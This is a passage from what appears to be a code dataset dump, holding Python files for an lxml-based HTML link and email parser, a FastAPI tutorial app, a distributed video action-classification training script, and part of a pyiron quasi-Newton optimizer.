soupparser\n\nparser_module_path: str = ''\ntry:\n parser_module_path = os.path.dirname(os.path.realpath(__file__))\nexcept NameError:\n parser_module_path = os.path.dirname(os.path.abspath(sys.argv[0]))\n\npath_append: str = os.path.dirname(parser_module_path)\nsys.path.append(path_append) if path_append not in sys.path else 0\n\ntry:\n from .models import Elements\n from .SeleniumBrowser.Selenium_Browser.utils.utils import Arrays, Utils, Strings\nexcept ModuleNotFoundError:\n from Selenium_Parser.models import Elements\n from Selenium_Parser.SeleniumBrowser.Selenium_Browser.utils.utils import Arrays, Utils, Strings\n\n# noinspection PyProtectedMember\nElement = etree._Element\n\n\nclass MLStripper(PyHTMLParser):\n def __init__(self):\n super().__init__()\n self.reset()\n self.strict = False\n self.convert_charrefs = True\n self.fed = []\n\n def handle_data(self, d):\n self.fed.append(d)\n\n def get_data(self):\n return ''.join(self.fed)\n\n\nclass HTMLParseReq(object):\n html: str\n parsed: Element\n\n def __init__(self, html: Optional[str] = None, parsed: Optional[Element] = None):\n if html is None and parsed is None:\n raise ValueError('Cannot initiate a parse request with the HTML and parsed object set to None. '\n 'One has to be set')\n elif html is not None:\n self.html = html\n self.parsed = HTMLParser.parse(html)\n else:\n self.parsed = parsed\n self.html = etree.tostring(parsed)\n\n def get_parsed(self):\n if self.parsed is not None:\n return self.parsed\n elif self.html is not None:\n return HTMLParser.parse(self.html)\n else:\n raise ValueError('Cannot carry out a parse request with the HTML and parsed object set to None. '\n 'One has to be set')\n\n def get_html(self):\n return self.html\n\n\nclass HTMLParser(object):\n html: str\n parsed: Element\n req: HTMLParseReq\n\n def __init__(self, req: HTMLParseReq):\n self.init(req)\n\n def init(self, req: HTMLParseReq):\n self.req = req\n self.html = req.html\n self.parsed = req.get_parsed()\n\n @staticmethod\n def parse(html: Optional[str] = None) -> Union[Element, None]:\n if html is None:\n return None\n\n try:\n parsed: Element = etree.HTML(html)\n except ValueError:\n try:\n parsed = etree.XML(html)\n except ValueError:\n try:\n parsed = soupparser.fromstring(html)\n except ValueError:\n parsed = None\n return parsed\n\n @staticmethod\n # Used to get the base_url for a link\n # (e.g. http://www.hello.com/blah/remove?dontwant returns hello or www.hello.com)\n def get_base_site(link: str, with_suffix: bool = True) -> str:\n new_link: str = parse.urlparse(link).netloc\n if with_suffix:\n return new_link\n else:\n split_link: List[str] = new_link.split('.')\n return split_link[1] if split_link[0] == 'www' else split_link[0]\n\n @staticmethod\n def check_link(link: str, ignore_anchors: Optional[bool] = False):\n if link is None:\n return None\n\n link = link.strip()\n return None if link == '' or (ignore_anchors and link[0] == '#') else link\n\n @staticmethod\n def add_http_link(url: str) -> str:\n if not re.match(r'http(s?)\\:', url):\n url = 'http://' + url\n return url\n\n @staticmethod\n # WARNING: This produces invalid URLs according to validator.url\n # Mostly used for database entry to avoid duplicate URLs\n # TODO: Took out query object but may be necessary? Not sure\n def normalize_link(url: str, with_prefix: Optional[bool] = False) -> str:\n if not re.match(r'http(s?)\\:', url):\n url = 'http://' + url\n\n parsed = parse.urlsplit(url)\n host: str = parsed.netloc + parsed.path\n if host.startswith('www.'):\n host = host[4:]\n host = HTMLParser.add_http_link(host) if with_prefix else host\n\n return host\n\n @staticmethod\n def join_urls(child_url: str, parent_url: Optional[str] = '',\n only_valid: Optional[bool] = True) -> Union[str, None]:\n if child_url is None:\n return None\n\n child_url = parse.urljoin(parent_url, child_url)\n if child_url != parent_url and validators.url(child_url):\n child_url = HTMLParser.normalize_link(child_url, with_prefix=True)\n elif only_valid:\n child_url = None\n\n return child_url\n\n @staticmethod\n def check_and_join_links(url: str, parent_url: Optional[str] = '',\n ignore_anchors: Optional[bool] = False) -> Union[str, None]:\n link: str = HTMLParser.check_link(url, ignore_anchors=ignore_anchors)\n return HTMLParser.join_urls(link, parent_url, only_valid=True)\n\n @staticmethod\n # Gets all links from the given HTMLReq object\n def get_all_links_(req: HTMLParseReq, parent_url: Optional[str] = '', ignore_anchors: Optional[bool] = False):\n parsed: Element = req.get_parsed()\n elements: List[Element] = parsed.xpath('//a')\n\n # Get all href's from a tags, return unique URLs, and filter out any null values\n check_function: Callable[[str], str] = lambda x: HTMLParser.check_and_join_links(x, parent_url, ignore_anchors)\n temp_links = [check_function(x.attrib.get('href')) for x in elements]\n return Arrays.remove_none(list(set(temp_links)))\n\n @staticmethod\n def get_email_pattern(email_divider: str = '@'):\n return re.compile(\"[a-z0-9\\.\\-+_]+{}[a-z0-9\\.\\-+_]+\\.[a-z]+\".format(re.escape(email_divider)), re.I)\n\n @staticmethod\n def get_all_email_patterns():\n email_checks: List[str] = ['@', '(at)', '[at]', '.at.']\n return [HTMLParser.get_email_pattern(x) for x in email_checks]\n\n @staticmethod\n # TODO: Generalize for any pattern\n def get_all_emails_(html: str, all_patterns: Optional[bool] = True):\n if all_patterns:\n searches: List[str] = HTMLParser.get_all_email_patterns()\n else:\n searches = [HTMLParser.get_email_pattern(email_divider='@')]\n\n emails: List[str] = []\n for search in searches:\n emails += re.findall(search, html)\n return list(set(emails))\n\n @staticmethod\n # Checks if two URLs are returning the same HTML\n def check_equals(html_a: str, html_b: str) -> bool:\n if html_a is None or html_b is None:\n return False\n else:\n html_a = Strings.remove_whitespace(html_a)\n html_b = Strings.remove_whitespace(html_b)\n\n return html_a == html_b\n\n @staticmethod\n def get_head(req: HTMLParseReq, remove_whitespace: Optional[bool] = False) -> Union[str, None]:\n parsed: Element = req.get_parsed()\n\n if parsed is None:\n return None\n\n element: Element = parsed.xpath('//head')\n if element is None:\n return None\n elif isinstance(element, list):\n element = element[0]\n\n head: str = element.text\n if head is None:\n return None\n\n return Strings.remove_whitespace(head) if remove_whitespace else head\n\n @staticmethod\n def get_surrounding_elements_(req: HTMLParseReq, model: Optional[Elements] = None) -> dict:\n element: Element = req.get_parsed()\n if element is None:\n return {}\n\n model = Utils.first_non_none(model, Elements())\n model.element_tag = element.tag\n model.element_text = element.text\n\n if model.element_text is None:\n model.element_text = ''\n\n parent: Element = element.getparent()\n if parent is not None:\n model.element_html = etree.tostring(parent)\n\n parent = parent.getparent()\n if parent is not None:\n model.parent_html = etree.tostring(parent)\n\n return model.to_dict()\n\n @staticmethod\n def search_for_elements_(req: HTMLParseReq, search: str, element_tag: Optional[str] = 'text()') -> List[Element]:\n parser = req.get_parsed()\n if parser is None:\n return []\n\n xpath: str = \"//*[contains({}, '{}')]\".format(element_tag, search)\n return parser.xpath(xpath)\n\n @staticmethod\n def parse_table_(req: HTMLParseReq, only_text: Optional[bool] = False,\n prefer_links: Optional[bool] = False) -> Union[List[List[Element]], List[List[str]]]:\n # Return a list of elements (instead of text/str) so can grab links if need be\n output: List[List[Element]] = []\n\n table: Element = req.get_parsed()\n if table is None or table.tag != 'table':\n return output\n\n # Get all table sections - ignore thead vs tbody for now\n table_sections: List[Element] = Arrays.listify(table.xpath('.//*[self::thead or self::tbody]'))\n\n for section in table_sections:\n # Get all rows\n rows: List[Element] = Arrays.listify(section.xpath('.//tr'))\n for row in rows:\n # Get all datum values - ignore th vs td for now - and append to output\n table_datums: List[Element] = Arrays.listify(row.xpath('.//*[self::th or self::td]'))\n if prefer_links:\n for idx in range(len(table_datums)):\n datum: Element = table_datums[idx]\n link_check: Element = Arrays.first(datum.xpath('.//a'))\n if link_check is not None:\n table_datums[idx] = link_check\n\n if only_text:\n output.append([x.text for x in table_datums])\n else:\n output.append(table_datums)\n\n return output\n\n @staticmethod\n def strip_tags(html: str) -> str:\n stripper = MLStripper()\n stripper.feed(html)\n return stripper.get_data()\n\n def get_all_emails(self, all_patterns: Optional[bool] = True) -> List[str]:\n return HTMLParser.get_all_emails_(self.html, all_patterns)\n\n def get_all_links(self, parent_url: Optional[str] = None,\n ignore_anchors: Optional[bool] = False) -> Union[List[str], None]:\n return HTMLParser.get_all_links_(self.req, parent_url, ignore_anchors)\n\n def get_surrounding_elements(self, model: Optional[Elements] = None) -> dict:\n return HTMLParser.get_surrounding_elements_(self.req, model=model)\n\n def search_for_elements(self, search: str, element_tag: Optional[str] = 'text()') -> List[Element]:\n return HTMLParser.search_for_elements_(self.req, search, element_tag=element_tag)\n\n def parse_table(self, only_text: Optional[bool] = False,\n prefer_links: Optional[bool] = False) -> List[List[Element]]:\n return HTMLParser.parse_table_(self.req, only_text=only_text, prefer_links=prefer_links)\n\n def get_parser(self) -> Element:\n return self.parsed\n\n def set_html_by_xpath(self, xpath: str) -> Element:\n item: Element = Arrays.first(self.get_parser().xpath(xpath))\n self.req = HTMLParseReq(parsed=item)\n self.init(self.req)\n return item\n","sub_path":"Selenium_Parser/HTMLParser.py","file_name":"HTMLParser.py","file_ext":"py","file_size_in_byte":11590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"451469701","text":"from fastapi import FastAPI\nfrom typing import Optional\n\nfrom enum import Enum\n\nfrom fastapi import FastAPI\n\nfake_items_db = [{\"item_name\": \"Foo\"}, {\"item_name\": \"Bar\"}, {\"item_name\": \"Baz\"}]\n\n\nclass ModelName(str, Enum):\n alexnet = \"alexnet\"\n resnet = \"resnet\"\n lenet = \"lenet\"\n\n\napp = FastAPI()\n\n\n@app.get(\"/items/\")\nasync def read_item(\n skip: int = 0, limit: int = 10\n): # Url Query paraments /items/?skip=0&limit=10\n return fake_items_db[skip : skip + limit]\n\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello World\"}\n\n\n@app.get(\"/items/{item_id}\")\nasync def read_item(item_id: str, q: Optional[str] = None):\n return {\"item_id\": item_id}\n\n\n@app.get(\"/users/me\")\nasync def read_user_me():\n return {\"user_id\": \"the current user\"}\n\n\n@app.get(\"/users/{user_id}\")\nasync def read_user(user_id: str):\n return {\"user_id\": user_id}\n\n\n@app.get(\"/model/{model_name}\")\nasync def get_model(model_name: ModelName):\n if model_name == ModelName.alexnet:\n return {\"model_name\": model_name, \"message\": \"Deep Learning FTW!\"}\n\n if model_name.value == \"lenet\":\n return {\"model_name\": model_name, \"message\": \"LeCNN all the images\"}\n\n return {\"model_name\": model_name, \"message\": \"Have some residuals\"}","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"624991277","text":"import os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" \nos.environ[\"CUDA_VISIBLE_DEVICES\"]= '0, 1, 2, 3'\nimport sys\nimport argparse\nimport logging\nimport time\nimport datetime\nfrom collections import defaultdict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\n\nimport torch.distributed as dist\n\nfrom datasets.build import make_dataloader\nimport numpy as np\nfrom pytorch_i3d import InceptionI3d\nfrom torchvision.models.video import r3d_18, mc3_18, r2plus1d_18\nfrom pytorch_c3d import C3D\n\n# from charades_dataset import Charades as Dataset\nfrom tqdm import tqdm\nfrom model_serialization import load_state_dict\nfrom detection.utils.logger import Logger\nfrom detection.utils.metric_logger import MetricLogger\nfrom detection.utils.comm import synchronize, get_rank\n\nfrom mpi4py import MPI\nimport apex\nfrom apex.parallel import DistributedDataParallel as DDP\nfrom detection.utils.comm import get_world_size\nfrom detection.utils.comm import is_main_process, all_gather, synchronize\n\nfrom datasets.evaluation.evaluation import ActionClassificationEvaluator\nfrom sklearn.metrics import ConfusionMatrixDisplay\nimport pickle as pkl\nimport pdb\n\nnp.set_printoptions(precision=3)\n\ndef reduce_loss_dict(loss_dict):\n \"\"\"\n Reduce the loss dictionary from all processes so that process with rank\n 0 has the averaged results. Returns a dict with the same fields as\n loss_dict, after reduction.\n \"\"\"\n world_size = get_world_size()\n if world_size < 2:\n return loss_dict\n with torch.no_grad():\n loss_names = []\n all_losses = []\n for k in sorted(loss_dict.keys()):\n loss_names.append(k)\n all_losses.append(loss_dict[k])\n # print(\"all_losses:\", all_losses)\n # print(\"\\n\")\n all_losses = torch.stack(all_losses, dim=0)\n if torch.isnan(torch.sum(all_losses)):\n pdb.set_trace()\n dist.reduce(all_losses, dst=0)\n if torch.isnan(torch.sum(all_losses)):\n pdb.set_trace()\n if dist.get_rank() == 0:\n # only main process gets accumulated, so only divide by\n # world_size in this case\n all_losses /= world_size\n \n reduced_losses = {k: v for k, v in zip(loss_names, all_losses)}\n return reduced_losses\n\ndef loss_func(pred, target):\n # sigmoid\n # bce_loss = F.binary_cross_entropy_with_logits(pred, target)\n # softmax\n ce_loss = F.cross_entropy(pred, target)\n return ce_loss\n\ndef do_train(model_name,\n model, \n train_dataloader, \n val_dataloader, \n device,\n checkpoint_peroid=1000, \n save_model='', \n logger=None, \n distributed=False,\n evaluator=None):\n\n lr = 0.01 #0.003 #init_lr\n optimizer = optim.SGD(model.parameters(), lr=lr, momentum=0.9, weight_decay=0.0000001)\n # NOTE: maybe the weight decay is too soon?\n lr_sched = optim.lr_scheduler.MultiStepLR(optimizer, [4000, 8000])\n\n num_steps_per_update = 1 #4 # accum gradient\n steps = 0\n\n tot_loc_loss = 0.0\n tot_cls_loss = 0.0\n\n if logger is None:\n logger = logging.getLogger(\"I3D.trainer\")\n logger.info(\"Start training\")\n meters = MetricLogger(delimiter=\" \")\n end = time.time()\n\n max_iters = len(train_dataloader)\n model.train()\n optimizer.zero_grad()\n # label_counts = defaultdict(int)\n for iters, data in enumerate(tqdm(train_dataloader)):\n data_time = time.time() - end\n iters += 1\n\n # get the inputs\n # inputs, labels, video_names, _, _ = data\n inputs, labels, video_names = data\n # wrap them in Variable\n inputs = Variable(inputs.to(device))\n t = inputs.size(2)\n labels = Variable(labels.to(device))\n per_frame_logits = model(inputs) # inputs: B X C X T X H X W\n # pdb.set_trace()\n if len(per_frame_logits.shape) == 3:\n per_frame_logits = per_frame_logits.mean(dim=-1) # B X C\n\n loss = loss_func(per_frame_logits, labels)\n # track time\n batch_time = time.time() - end\n \n # reduce losses over all GPUs for logging purposes\n loss_dict = {\"loss_cls\": loss} #{\"loss_loc\": loc_loss, \"loss_cls\": cls_loss}\n loss_dict_reduced = reduce_loss_dict(loss_dict)\n losses_reduced = loss_dict_reduced['loss_cls'] #0.5 * loss_dict_reduced['loss_loc'] + 0.5 * loss_dict_reduced['loss_cls']\n\n loss.backward()\n grad_norm = torch.nn.utils.clip_grad_norm_(model.parameters(), 5)\n\n meters.update(loss=losses_reduced, **loss_dict_reduced)\n meters.update(time=batch_time, data=data_time)\n\n # estimate the rest of the running time\n eta_seconds = meters.time.global_avg * (max_iters - iters)\n eta_string = str(datetime.timedelta(seconds=int(eta_seconds)))\n\n if iters % num_steps_per_update == 0 or iters == len(train_dataloader):\n steps += 1\n optimizer.step()\n optimizer.zero_grad()\n\n lr_sched.step()\n if steps % 1 == 0:\n # NOTE: Add log file \n info = meters.delimiter.join(\n [\n \"eta: {eta}\",\n \"iter: {iter}\",\n \"{meters}\",\n \"lr: {lr:.6f}\",\n \"max mem: {memory:.0f}\",\n ]\n ).format(\n eta=eta_string,\n iter=iters,\n meters=str(meters),\n lr=optimizer.param_groups[0][\"lr\"],\n memory=torch.cuda.max_memory_allocated() / 1024.0 / 1024.0,\n )\n \n if hasattr(logger, 'log_values'):\n logger.info(info) \n for name, meter in meters.meters.items():\n logger.log_values({name: meter.median}, step=iters)\n logger.log_values({\"grad_norm\": grad_norm}, step=iters)\n else:\n print(info)\n \n if steps % checkpoint_peroid == 0:\n del inputs, loss\n model.eval()\n do_val(model_name,\n model, \n val_dataloader, \n device,\n distributed, \n logger, \n output_dir=os.path.join(save_model, 'inference'),\n train_iters=iters,\n evaluator=evaluator)\n model.train()\n \n if get_rank() == 0: # only save model for rank0\n if not os.path.isdir(save_model):\n os.makedirs(save_model)\n \n save_dir = os.path.join(save_model, str(steps).zfill(6)+'.pt')\n if hasattr(model, 'module'):\n torch.save(model.module.state_dict(), save_dir)\n else:\n torch.save(model.state_dict(), save_dir)\n\n end = time.time()\ndef do_val(model_name,\n model, \n val_dataloader, \n device, \n distributed=False,\n logger=None, \n output_dir='', \n train_iters=0, \n evaluator=None):\n if logger is None:\n logger = logging.getLogger(\"I3D.trainer\")\n\n torch.cuda.empty_cache() # TODO check if it helps\n\n tot_loc_loss = 0.0\n tot_cls_loss = 0.0\n \n # run on dataset\n results = defaultdict(list)\n target_labels = {}\n for iters, data in enumerate(tqdm(val_dataloader)):\n # get the inputs\n # inputs, labels, video_names, start, end = data\n inputs, labels, video_names= data\n # wrap them in Variable\n inputs = inputs.to(device)\n t = inputs.size(2)\n labels = labels.to(device)\n\n per_frame_logits = model(inputs)\n if len(per_frame_logits.shape) == 3:\n per_frame_logits = per_frame_logits.mean(dim=-1)\n\n loss = loss_func(per_frame_logits, labels)\n loss = loss.item() #(0.5*loc_loss + 0.5*cls_loss)\n tot_cls_loss += loss\n # collect results\n per_frame_logits = F.softmax(per_frame_logits, dim=1).detach().cpu()\n for batch_id, vid in enumerate(video_names):\n # frame_id = int((start[batch_id] + end[batch_id])/2)\n # pred = per_frame_logits[batch_id]\n # if vid not in results:\n # results[vid] = {}\n # assert frame_id not in results[vid]\n # results[vid][frame_id] = pred\n pred = per_frame_logits[batch_id]\n results[vid].append(pred)\n target_labels[vid] = int(labels[batch_id].detach().cpu())\n\n if hasattr(logger, 'log_values'):\n logger.log_values({\"loss_cls_val\": tot_cls_loss/(iters+1)}, step=train_iters) \n\n results = _accumulate_from_multiple_gpus(results)\n if not is_main_process():\n return\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n # torch.save(results, os.path.join(output_dir, 'predictions.pth'))\n # Run video-level evaluation\n per_vid_confusion_matrix = np.zeros((16, 16))\n per_clip_confusion_matrix = np.zeros((16, 16))\n per_vid_top3_acc = np.zeros(16)\n per_clip_top3_acc = np.zeros(16)\n per_class_clip_num = np.zeros(16)\n # Save per video prediction\n all_per_vid_results = {}\n for vid in results.keys():\n # ----------\n # NOTE: add clip-level accuracy\n clip_results = torch.stack(results[vid], dim=0)\n for per_clip_result in clip_results:\n _, sorted_pred = torch.sort(per_clip_result, descending=True)\n top1_pred = sorted_pred[0]\n top3_pred = sorted_pred[:3]\n y_true = target_labels[vid]\n per_class_clip_num[y_true] += 1\n per_clip_confusion_matrix[y_true, top1_pred] += 1\n if y_true in top3_pred:\n per_clip_top3_acc[y_true] += 1\n # ---------\n\n # ---------\n # per video results\n per_vid_results = torch.stack(results[vid], dim=0).mean(dim=0)\n all_per_vid_results[vid] = per_vid_results\n _, sorted_pred = torch.sort(per_vid_results, descending=True)\n top1_pred = sorted_pred[0]\n top3_pred = sorted_pred[:3]\n y_true = target_labels[vid]\n per_vid_confusion_matrix[y_true, top1_pred] += 1\n if y_true in top3_pred:\n per_vid_top3_acc[y_true] += 1\n # ---------\n \n # Save per video prediction\n pkl.dump(all_per_vid_results, open(os.path.join('/u/bryao/work/DATA/i3d_outputs', model_name, 'per_video_results.pkl'), 'wb'))\n\n # per clip results\n per_clip_top_1_acc = per_clip_confusion_matrix.diagonal() / (per_clip_confusion_matrix.sum(axis=1) + 1e-6)\n per_clip_top_3_acc = np.array([num/per_class_clip_num[i] for i, num in enumerate(per_clip_top3_acc)])\n logger.info(\"Clip-level evalutaion:\")\n per_clip_result = \"Top 1 acc: {}, Top 3 acc: {}, per_cls_acc: {}\".format(np.around(per_clip_top_1_acc.mean(), 3), \n np.around(per_clip_top_3_acc.mean(), 3), \n np.around(per_clip_top_1_acc, 3))\n logger.info(per_clip_result)\n print(per_clip_result)\n print(\"confusion matrix:\", np.around(per_clip_confusion_matrix, 3))\n # np.save('/u/bryao/work/DATA/i3d_outputs/r2plus1d_18/confusion_matrix_7000.npy', per_clip_confusion_matrix)\n if hasattr(logger, 'log_values'):\n logger.log_values({'Per clip Top 1 Acc': per_clip_top_1_acc.mean()}, step=train_iters)\n logger.log_values({'Per clip Top 3 Acc': per_clip_top_3_acc.mean()}, step=train_iters)\n\n # per video results\n data_category_stats = val_dataloader.dataset.data_category_stats\n top_1_acc = per_vid_confusion_matrix.diagonal() / (per_vid_confusion_matrix.sum(axis=1) + 1e-6)\n top_3_acc = np.array([num/data_category_stats[i] for i, num in enumerate(per_vid_top3_acc)])\n logger.info(\"Video-level evalutaion:\")\n per_vid_result = \"Top 1 acc: {}, Top 3 acc: {}, per_cls_acc: {}\".format(np.around(top_1_acc.mean(), 3), \n np.around(top_3_acc.mean(), 3), \n np.around(top_1_acc, 3))\n logger.info(per_vid_result)\n print(per_vid_result)\n if hasattr(logger, 'log_values'):\n logger.log_values({'Per vid Top 1 Acc': top_1_acc.mean()}, step=train_iters)\n logger.log_values({'Per vid Top 3 Acc': top_3_acc.mean()}, step=train_iters)\n\n\n # # Run video-level evaluation\n # eval_results = evaluator.evaluate(results)\n # for k, v in eval_results.items():\n # logger.info('{}:{}'.format(k, v))\n # if isinstance(v, (float, int)) and hasattr(logger, 'log_values'):\n # logger.log_values(eval_results, step=train_iters)\n\n # if 'confusion_matrix' in eval_results:\n # cm_display = ConfusionMatrixDisplay(eval_results['confusion_matrix'], \n # display_labels=val_dataloader.dataset.name_shorts)\n # ret = cm_display.plot(fontsize=6)\n # logger.log_plot(ret.figure_, label='Confusion Matrix',step=train_iters)\n\ndef _accumulate_from_multiple_gpus(item_per_gpu):\n # all_keys\n all_items = all_gather(item_per_gpu)\n if not is_main_process():\n return\n # merge the list of dicts\n predictions = {}\n for p in all_items:\n predictions.update(p)\n return predictions\n\ndef run(model_name='i3d',\n init_lr=0.1, \n gpu_id=0,\n max_steps=64e3, \n batch_per_gpu=4,\n mode='rgb', \n root='/home/data/vision7/A3D_2.0/frames/', #'/ssd/Charades_v1_rgb', \n train_split='A3D_2.0_train.json', #'charades/charades.json', \n val_split='A3D_2.0_val.json',\n checkpoint_peroid=1000,\n save_model='',\n with_normal=True):\n\n \n num_gpus = MPI.COMM_WORLD.Get_size()\n distributed = False\n if num_gpus > 1:\n distributed = True\n\n local_rank = MPI.COMM_WORLD.Get_rank() % torch.cuda.device_count()\n\n if distributed:\n torch.cuda.set_device(local_rank)\n host = os.environ[\"MASTER_ADDR\"] if \"MASTER_ADDR\" in os.environ else \"127.0.0.1\"\n torch.distributed.init_process_group(\n backend=\"nccl\",\n init_method='tcp://{}:12345'.format(host),\n rank=MPI.COMM_WORLD.Get_rank(),\n world_size=MPI.COMM_WORLD.Get_size()\n )\n\n synchronize()\n # logger must be initialized after distributed!\n cfg = {'PROJECT': 'i3d_a3d'}\n if args.use_wandb:\n logger = Logger(\"I3D\",\n cfg,#convert_to_dict(cfg, []),\n project = 'i3d_a3d',\n viz_backend=\"wandb\" \n )\n else:\n logger = logging.Logger('I3D')\n\n logger.info(\"Using {} GPUs\".format(num_gpus))\n # setup dataset\n\n train_dataloader = make_dataloader(root,\n train_split, \n mode,\n model_name,\n seq_len=16, #64,\n overlap=15, #32,\n phase='train', \n max_iters=10000, \n batch_per_gpu=batch_per_gpu, #8,\n num_workers=16, \n shuffle=True, \n distributed=distributed,\n with_normal=with_normal)\n\n val_dataloader = make_dataloader(root,\n val_split, \n mode,\n model_name,\n seq_len=16, #64, \n overlap=15, #32,\n phase='val', \n max_iters=None, \n batch_per_gpu=batch_per_gpu, #8,\n num_workers=16, \n shuffle=False, \n distributed=distributed,\n with_normal=with_normal)\n # setup the model\n # set dropout_keep_prob=0.0 for overfit\n logger.info(\"Running {} model\".format(model_name))\n if model_name == 'i3d':\n if mode == 'flow':\n model = InceptionI3d(train_dataloader.dataset.num_classes, in_channels=2, dropout_keep_prob=0.5)\n load_state_dict(model, torch.load('models/flow_imagenet.pt'), ignored_prefix='logits')\n logger.info(\"Loaded pretrained I3D\")\n else:\n model = InceptionI3d(train_dataloader.dataset.num_classes, in_channels=3, dropout_keep_prob=0.5)\n load_state_dict(model, torch.load('models/rgb_imagenet.pt'), ignored_prefix='logits')\n logger.info(\"Loaded pretrained I3D\")\n model.replace_logits(train_dataloader.dataset.num_classes)\n elif model_name == 'r3d_18':\n model = r3d_18(pretrained=True, num_classes=train_dataloader.dataset.num_classes)\n elif model_name == 'mc3_18':\n model = mc3_18(pretrained=True, num_classes=train_dataloader.dataset.num_classes)\n elif model_name == 'r2plus1d_18':\n model = r2plus1d_18(pretrained=True, num_classes=train_dataloader.dataset.num_classes)\n elif model_name == 'c3d':\n model = C3D(pretrained=True, num_classes=train_dataloader.dataset.num_classes)\n else:\n raise NameError('unknown model name:{}'.format(model_name))\n if hasattr(logger, 'run_id'):\n run_id = logger.run_id\n else:\n run_id = 'no_wandb'\n \n save_model = os.path.join(save_model, model_name, run_id)\n\n # Create evaluator\n evaluator = ActionClassificationEvaluator(cfg=None,\n dataset=val_dataloader.dataset,\n split='val',\n mode='accuracy',#'mAP',\n output_dir=save_model,\n with_normal=with_normal)\n\n # device = torch.device('cuda')\n device = torch.device('cuda:{}'.format(gpu_id))\n model.to(device)\n if distributed:\n model = apex.parallel.convert_syncbn_model(model)\n model = DDP(model.to(device), delay_allreduce=True)\n # ckpt = '/home/data/vision7/brianyao/DATA/i3d_outputs/i3d/tg9s4ff5/004500.pt'\n # load_state_dict(model, torch.load(ckpt))\n\n # #######NOTE: only for testing checkpoint is correct or not ##\n # model.eval()\n # do_val(model, \n # val_dataloader, \n # device,\n # distributed, \n # logger, \n # output_dir=os.path.join(save_model, 'inference'),\n # train_iters=0,\n # evaluator=evaluator)\n # pdb.set_trace()\n # #########\n do_train(model_name,\n model, \n train_dataloader, \n val_dataloader, \n device=device,\n checkpoint_peroid=checkpoint_peroid, \n save_model=save_model, \n logger=logger,\n evaluator=evaluator)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-model_name', type=str, help='name of the model to run')\n parser.add_argument('-mode', type=str, help='rgb or flow')\n parser.add_argument('-save_model', type=str)\n parser.add_argument('-root', type=str)\n parser.add_argument('-train_split', type=str)\n parser.add_argument('-val_split', type=str)\n parser.add_argument('-batch_per_gpu', type=int)\n parser.add_argument('-gpu', type=int)\n parser.add_argument('-checkpoint_peroid', type=int)\n parser.add_argument('-use_wandb', const=True, nargs='?')\n args = parser.parse_args()\n \n # need to add argparse\n run(model_name=args.model_name,\n mode=args.mode, \n gpu_id=args.gpu,\n batch_per_gpu=args.batch_per_gpu,\n train_split=args.train_split, \n val_split=args.val_split, \n root=args.root, \n save_model=args.save_model, \n checkpoint_peroid=args.checkpoint_peroid,\n with_normal=False\n )\n","sub_path":"train_i3d.py","file_name":"train_i3d.py","file_ext":"py","file_size_in_byte":20671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111556577","text":"import numpy as np\nfrom pyiron_base import GenericParameters\nimport warnings\nfrom pyiron_atomistics.atomistics.job.interactivewrapper import (\n InteractiveWrapper,\n ReferenceJobOutput,\n)\n\n\nclass QuasiNewtonInteractive:\n \"\"\"\n Interactive class of Quasi Newton. This class can be used without a pyiron job definition.\n After the initialization, the displacement is obtained by calling `get_dx` successively.\n \"\"\"\n\n def __init__(\n self,\n structure,\n starting_h=10,\n diffusion_id=None,\n diffusion_direction=None,\n use_eigenvalues=True,\n symmetrize=True,\n max_displacement=0.1,\n ):\n \"\"\"\n Args:\n structure (pyiron_atomistics.atomistics.structure.atoms.Atoms): pyiron structure\n starting_H (float/ndarray): Starting Hessian value (diagonal value or total Hessian)\n diffusion_id (int/None): Atom id at saddle point. No need to define if the structure\n is close enough to the saddle point. This has to be defined together with\n `diffusion_direction`.\n use_eigenvalues (bool): Whether to use the eigenvalue softening or standard Tikhonov\n regularization to prevent unphysical displacement.\n symmetrize (bool): Whether to symmetrize forces following the box symmetries. DFT\n calculations might fail if set to `False`\n max_displacement (float): Maximum displacement allowed for an atom.\n \"\"\"\n self.use_eigenvalues = use_eigenvalues\n self._hessian = None\n self._eigenvalues = None\n self._eigenvectors = None\n self.g_old = None\n self.symmetry = None\n self.max_displacement = max_displacement\n self.regularization = None\n if symmetrize:\n self.symmetry = structure.get_symmetry()\n self._initialize_hessian(\n structure=structure,\n starting_h=starting_h,\n diffusion_id=diffusion_id,\n diffusion_direction=diffusion_direction,\n )\n\n def _initialize_hessian(\n self, structure, starting_h=10, diffusion_id=None, diffusion_direction=None\n ):\n if (\n np.prod(np.array(starting_h).shape)\n == np.prod(structure.positions.shape) ** 2\n ):\n self.hessian = starting_h\n else:\n self.hessian = starting_h * np.eye(np.prod(structure.positions.shape))\n if diffusion_id is not None and diffusion_direction is not None:\n v = np.zeros_like(structure.positions)\n v[diffusion_id] = diffusion_direction\n v = v.flatten()\n self.hessian -= (\n (starting_h + 1) * np.einsum(\"i,j->ij\", v, v) / np.linalg.norm(v) ** 2\n )\n self.use_eigenvalues = True\n elif diffusion_id is not None or diffusion_direction is not None:\n raise ValueError(\"diffusion id or diffusion direction not specified\")\n\n def _set_regularization(self, g, max_cycle=20, max_value=20, tol=1.0e-8):\n self.regularization = -2\n for _ in range(max_cycle):\n if np.absolute(self.inv_hessian.dot(g)).max() < self.max_displacement:\n break\n self.regularization += 1\n if np.absolute(self.regularization) > max_value:\n self.regularization = max_value\n\n @property\n def inv_hessian(self):\n if self.regularization is None:\n return np.linalg.inv(self.hessian)\n if self.use_eigenvalues:\n return np.einsum(\n \"ik,k,jk->ij\",\n self.eigenvectors,\n self.eigenvalues\n / (self.eigenvalues**2 + np.exp(self.regularization)),\n self.eigenvectors,\n )\n else:\n return np.linalg.inv(\n self.hessian + np.eye(len(self.hessian)) * np.exp(self.regularization)\n )\n\n @property\n def hessian(self):\n return self._hessian\n\n @hessian.setter\n def hessian(self, v):\n self._hessian = np.array(v)\n length = int(np.sqrt(np.prod(self._hessian.shape)))\n self._hessian = self._hessian.reshape(length, length)\n self._eigenvalues = None\n 